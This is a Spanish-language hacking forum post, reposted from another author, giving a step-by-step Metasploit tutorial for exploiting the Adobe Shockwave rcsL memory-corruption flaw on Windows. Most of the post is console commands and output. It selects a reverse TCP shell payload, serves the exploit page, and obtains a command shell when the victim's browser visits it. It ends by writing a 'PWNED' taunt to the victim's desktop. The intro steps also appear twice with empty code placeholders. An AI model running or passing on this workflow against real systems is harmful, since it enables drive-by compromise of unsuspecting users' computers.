Para ver Todo el contenido del foro es necesario estar Registrado! 
Dom Oct 31, 2010 9:17 pm
Bueno gente les traigo adobe_shockwave_rcsl_corruption un 0day que salió hace poco (21/10/2010) y ya lo pueden disfrutar de la mano de la gente de Metasploit que no se les escapa una, por lo que estuve leyendo funciona tanto en XP, como en Vista y Seven(solo lo probé en XP), el tutorial está creado por rus0pr0, iba a hacer yo uno, pero se adelantó, para el que quiere un poco más de información les dejo el siguiente link:
[Tienes que estar registrado y conectado para ver este vínculo]
Ok, vamos a lo divertido, sudo ./msfconsole y empezamos:
Miramos los payloads que podemos usar:
Código:
Todo bien, lo explotamos:
Código:
Le pasamos la dirección al navegador:
Código:
Ya tenemos shell(al error no le den bola es porque al subir la shell trata de migrarla a otro proceso como si fuera meterpreter, pero con la shell no se puede)
Bueno vemos las sesiones disponibles, interactuamos, le dejamos un saludo a la víctima en el escritorio y nos vamos.
Código:
Espero les sirva a todos, el autor fue skilmmax,ahora yo se los traigo a ustedes usuarios de pitbull security!
[Tienes que estar registrado y conectado para ver este vínculo]
Ok, vamos a lo divertido, sudo ./msfconsole y empezamos:
- Código:
# # ###### ##### ## #### ##### # #### # #####
## ## # # # # # # # # # # # #
# ## # ##### # # # #### # # # # # # #
# # # # ###### # ##### # # # # #
# # # # # # # # # # # # # #
# # ###### # # # #### # ###### #### # #
=[ metasploit v3.5.1-dev [core:3.5 api:1.0]
+ -- --=[ 615 exploits - 306 auxiliary
+ -- --=[ 215 payloads - 27 encoders - 8 nops
=[ svn r10780 updated today (2010.10.22)
msf > use windows/browser/adobe_shockwave_rcsl_corruption
msf exploit(adobe_shockwave_rcsl_corruption) > info
Name: Adobe Shockwave rcsL Memory Corruption
Version: 10779
Platform: Windows
Privileged: No
License: Metasploit Framework License (BSD)
Rank: Normal
Provided by:
David Kennedy "ReL1K"
Available targets:
Id Name
-- ----
0 Automatic
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host to listen on.
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
URIPATH no The URI to use for this exploit (default is random)
Payload information:
Space: 1024
Avoid: 4 characters
Description:
This module exploits a weakness in the Adobe Shockwave player's
handling of Director movies (.DIR). A memory corruption
vulnerability occurs through an undocumented rcsL chunk. This
vulnerability was discovered by http://www.abysssec.com.
References:
http://www.exploit-db.com/sploits/Adobe_Shockwave_Director_rcsL_Chunk_Memory_Corruption.zip
Miramos los payloads que podemos usar:
Código:
- Código:
msf exploit(adobe_shockwave_rcsl_corruption) > show payloads
Compatible Payloads
===================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
generic/debug_trap normal Generic x86 Debug Trap
generic/shell_bind_tcp normal Generic Command Shell, Bind TCP Inline
generic/shell_reverse_tcp normal Generic Command Shell, Reverse TCP Inline
generic/tight_loop normal Generic x86 Tight Loop
windows/dllinject/bind_ipv6_tcp normal Reflective Dll Injection, Bind TCP Stager (IPv6)
windows/dllinject/bind_nonx_tcp normal Reflective Dll Injection, Bind TCP Stager (No NX or Win7)
windows/dllinject/bind_tcp normal Reflective Dll Injection, Bind TCP Stager
windows/dllinject/reverse_http normal Reflective Dll Injection, PassiveX Reverse HTTP Tunneling Stager
windows/dllinject/reverse_ipv6_tcp normal Reflective Dll Injection, Reverse TCP Stager (IPv6)
windows/dllinject/reverse_nonx_tcp normal Reflective Dll Injection, Reverse TCP Stager (No NX or Win7)
windows/dllinject/reverse_ord_tcp normal Reflective Dll Injection, Reverse Ordinal TCP Stager (No NX or Win7)
windows/dllinject/reverse_tcp normal Reflective Dll Injection, Reverse TCP Stager
windows/dllinject/reverse_tcp_allports normal Reflective Dll Injection, Reverse All-Port TCP Stager
windows/dllinject/reverse_tcp_dns normal Reflective Dll Injection, Reverse TCP Stager (DNS)
windows/download_exec normal Windows Executable Download and Execute
windows/exec normal Windows Execute Command
windows/messagebox normal Windows MessageBox
windows/meterpreter/bind_ipv6_tcp normal Windows Meterpreter (Reflective Injection), Bind TCP Stager (IPv6)
windows/meterpreter/bind_nonx_tcp normal Windows Meterpreter (Reflective Injection), Bind TCP Stager (No NX or Win7)
windows/meterpreter/bind_tcp normal Windows Meterpreter (Reflective Injection), Bind TCP Stager
windows/meterpreter/reverse_http normal Windows Meterpreter (Reflective Injection), PassiveX Reverse HTTP Tunneling Stager
windows/meterpreter/reverse_https normal Windows Meterpreter (Reflective Injection), Reverse HTTPS Stager
windows/meterpreter/reverse_ipv6_tcp normal Windows Meterpreter (Reflective Injection), Reverse TCP Stager (IPv6)
windows/meterpreter/reverse_nonx_tcp normal Windows Meterpreter (Reflective Injection), Reverse TCP Stager (No NX or Win7)
windows/meterpreter/reverse_ord_tcp normal Windows Meterpreter (Reflective Injection), Reverse Ordinal TCP Stager (No NX or Win7)
windows/meterpreter/reverse_tcp normal Windows Meterpreter (Reflective Injection), Reverse TCP Stager
windows/meterpreter/reverse_tcp_allports normal Windows Meterpreter (Reflective Injection), Reverse All-Port TCP Stager
windows/meterpreter/reverse_tcp_dns normal Windows Meterpreter (Reflective Injection), Reverse TCP Stager (DNS)
windows/metsvc_bind_tcp normal Windows Meterpreter Service, Bind TCP
windows/metsvc_reverse_tcp normal Windows Meterpreter Service, Reverse TCP Inline
windows/patchupdllinject/bind_ipv6_tcp normal Windows Inject DLL, Bind TCP Stager (IPv6)
windows/patchupdllinject/bind_nonx_tcp normal Windows Inject DLL, Bind TCP Stager (No NX or Win7)
windows/patchupdllinject/bind_tcp normal Windows Inject DLL, Bind TCP Stager
windows/patchupdllinject/reverse_ipv6_tcp normal Windows Inject DLL, Reverse TCP Stager (IPv6)
windows/patchupdllinject/reverse_nonx_tcp normal Windows Inject DLL, Reverse TCP Stager (No NX or Win7)
windows/patchupdllinject/reverse_ord_tcp normal Windows Inject DLL, Reverse Ordinal TCP Stager (No NX or Win7)
windows/patchupdllinject/reverse_tcp normal Windows Inject DLL, Reverse TCP Stager
windows/patchupdllinject/reverse_tcp_allports normal Windows Inject DLL, Reverse All-Port TCP Stager
windows/patchupdllinject/reverse_tcp_dns normal Windows Inject DLL, Reverse TCP Stager (DNS)
windows/patchupmeterpreter/bind_ipv6_tcp normal Windows Meterpreter (skape/jt injection), Bind TCP Stager (IPv6)
windows/patchupmeterpreter/bind_nonx_tcp normal Windows Meterpreter (skape/jt injection), Bind TCP Stager (No NX or Win7)
windows/patchupmeterpreter/bind_tcp normal Windows Meterpreter (skape/jt injection), Bind TCP Stager
windows/patchupmeterpreter/reverse_ipv6_tcp normal Windows Meterpreter (skape/jt injection), Reverse TCP Stager (IPv6)
windows/patchupmeterpreter/reverse_nonx_tcp normal Windows Meterpreter (skape/jt injection), Reverse TCP Stager (No NX or Win7)
windows/patchupmeterpreter/reverse_ord_tcp normal Windows Meterpreter (skape/jt injection), Reverse Ordinal TCP Stager (No NX or Win7)
windows/patchupmeterpreter/reverse_tcp normal Windows Meterpreter (skape/jt injection), Reverse TCP Stager
windows/patchupmeterpreter/reverse_tcp_allports normal Windows Meterpreter (skape/jt injection), Reverse All-Port TCP Stager
windows/patchupmeterpreter/reverse_tcp_dns normal Windows Meterpreter (skape/jt injection), Reverse TCP Stager (DNS)
windows/shell/bind_ipv6_tcp normal Windows Command Shell, Bind TCP Stager (IPv6)
windows/shell/bind_nonx_tcp normal Windows Command Shell, Bind TCP Stager (No NX or Win7)
windows/shell/bind_tcp normal Windows Command Shell, Bind TCP Stager
windows/shell/reverse_http normal Windows Command Shell, PassiveX Reverse HTTP Tunneling Stager
windows/shell/reverse_ipv6_tcp normal Windows Command Shell, Reverse TCP Stager (IPv6)
windows/shell/reverse_nonx_tcp normal Windows Command Shell, Reverse TCP Stager (No NX or Win7)
windows/shell/reverse_ord_tcp normal Windows Command Shell, Reverse Ordinal TCP Stager (No NX or Win7)
windows/shell/reverse_tcp normal Windows Command Shell, Reverse TCP Stager
windows/shell/reverse_tcp_allports normal Windows Command Shell, Reverse All-Port TCP Stager
windows/shell/reverse_tcp_dns normal Windows Command Shell, Reverse TCP Stager (DNS)
windows/shell_bind_tcp normal Windows Command Shell, Bind TCP Inline
windows/shell_bind_tcp_xpfw normal Windows Disable Windows ICF, Command Shell, Bind TCP Inline
windows/shell_reverse_tcp normal Windows Command Shell, Reverse TCP Inline
windows/upexec/bind_ipv6_tcp normal Windows Upload/Execute, Bind TCP Stager (IPv6)
windows/upexec/bind_nonx_tcp normal Windows Upload/Execute, Bind TCP Stager (No NX or Win7)
windows/upexec/bind_tcp normal Windows Upload/Execute, Bind TCP Stager
windows/upexec/reverse_http normal Windows Upload/Execute, PassiveX Reverse HTTP Tunneling Stager
windows/upexec/reverse_ipv6_tcp normal Windows Upload/Execute, Reverse TCP Stager (IPv6)
windows/upexec/reverse_nonx_tcp normal Windows Upload/Execute, Reverse TCP Stager (No NX or Win7)
windows/upexec/reverse_ord_tcp normal Windows Upload/Execute, Reverse Ordinal TCP Stager (No NX or Win7)
windows/upexec/reverse_tcp normal Windows Upload/Execute, Reverse TCP Stager
windows/upexec/reverse_tcp_allports normal Windows Upload/Execute, Reverse All-Port TCP Stager
windows/upexec/reverse_tcp_dns normal Windows Upload/Execute, Reverse TCP Stager (DNS)
windows/vncinject/bind_ipv6_tcp normal VNC Server (Reflective Injection), Bind TCP Stager (IPv6)
windows/vncinject/bind_nonx_tcp normal VNC Server (Reflective Injection), Bind TCP Stager (No NX or Win7)
windows/vncinject/bind_tcp normal VNC Server (Reflective Injection), Bind TCP Stager
windows/vncinject/reverse_http normal VNC Server (Reflective Injection), PassiveX Reverse HTTP Tunneling Stager
windows/vncinject/reverse_ipv6_tcp normal VNC Server (Reflective Injection), Reverse TCP Stager (IPv6)
windows/vncinject/reverse_nonx_tcp normal VNC Server (Reflective Injection), Reverse TCP Stager (No NX or Win7)
windows/vncinject/reverse_ord_tcp normal VNC Server (Reflective Injection), Reverse Ordinal TCP Stager (No NX or Win7)
windows/vncinject/reverse_tcp normal VNC Server (Reflective Injection), Reverse TCP Stager
windows/vncinject/reverse_tcp_allports normal VNC Server (Reflective Injection), Reverse All-Port TCP Stager
windows/vncinject/reverse_tcp_dns normal VNC Server (Reflective Injection), Reverse TCP Stager (DNS)
Seteamos el payload, rellenamos con la informacion que necesitemos y nos fijamos si esta ok:
[b]Código:[/b]
msf exploit(adobe_shockwave_rcsl_corruption) > set PAYLOAD windows/shell/reverse_tcp
PAYLOAD => windows/shell/reverse_tcp
msf exploit(adobe_shockwave_rcsl_corruption) > set LHOST 192.168.1.101
LHOST => 192.168.1.101
msf exploit(adobe_shockwave_rcsl_corruption) > set URIPATH /
URIPATH => /
msf exploit(adobe_shockwave_rcsl_corruption) > set SRVPORT 80
SRVPORT => 80
msf exploit(adobe_shockwave_rcsl_corruption) > show options
Module options:
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host to listen on.
SRVPORT 80 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
URIPATH / no The URI to use for this exploit (default is random)
Payload options (windows/shell/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique: seh, thread, none, process
LHOST 192.168.1.101 yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
Todo bien, lo explotamos:
Código:
- Código:
msf exploit(adobe_shockwave_rcsl_corruption) > exploit
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.1.101:4444
[*] Using URL: http://0.0.0.0:80/
[*] Local IP: http://192.168.1.101:80/
[*] Server started.
Le pasamos la dirección al navegador:
Código:
- Código:
msf exploit(adobe_shockwave_rcsl_corruption) >
[*] Sending exploit HTML to 192.168.1.100:1051...
[*] Sending exploit DIR to 192.168.1.100:1054...
[*] Sending stage (240 bytes) to 192.168.1.100
[*] Command shell session 1 opened (192.168.1.101:4444 -> 192.168.1.100:1055) at Fri Oct 22 07:22:58 -0300 2010
[*] Session ID 1 (192.168.1.101:4444 -> 192.168.1.100:1055) processing InitialAutoRunScript 'migrate -f'
[-] Error: Command shell sessions do not support migration
Ya tenemos shell(al error no le den bola es porque al subir la shell trata de migrarla a otro proceso como si fuera meterpreter, pero con la shell no se puede)
Bueno vemos las sesiones disponibles, interactuamos, le dejamos un saludo a la víctima en el escritorio y nos vamos.
Código:
- Código:
msf exploit(adobe_shockwave_rcsl_corruption) > sessions
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
1 shell 192.168.1.101:4444 -> 192.168.1.100:1055
msf exploit(adobe_shockwave_rcsl_corruption) > sessions -i 1
[*] Starting interaction with 1...
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\Administrator\Desktop>echo "PWNED :), hasta la proxima" > pwned.txt
echo "PWNED :), hasta la proxima" > pwned.txt
C:\Documents and Settings\Administrator\Desktop>
[*] Command shell session 1 closed.
Espero les sirva a todos, el autor fue skilmmax,ahora yo se los traigo a ustedes usuarios de pitbull security!
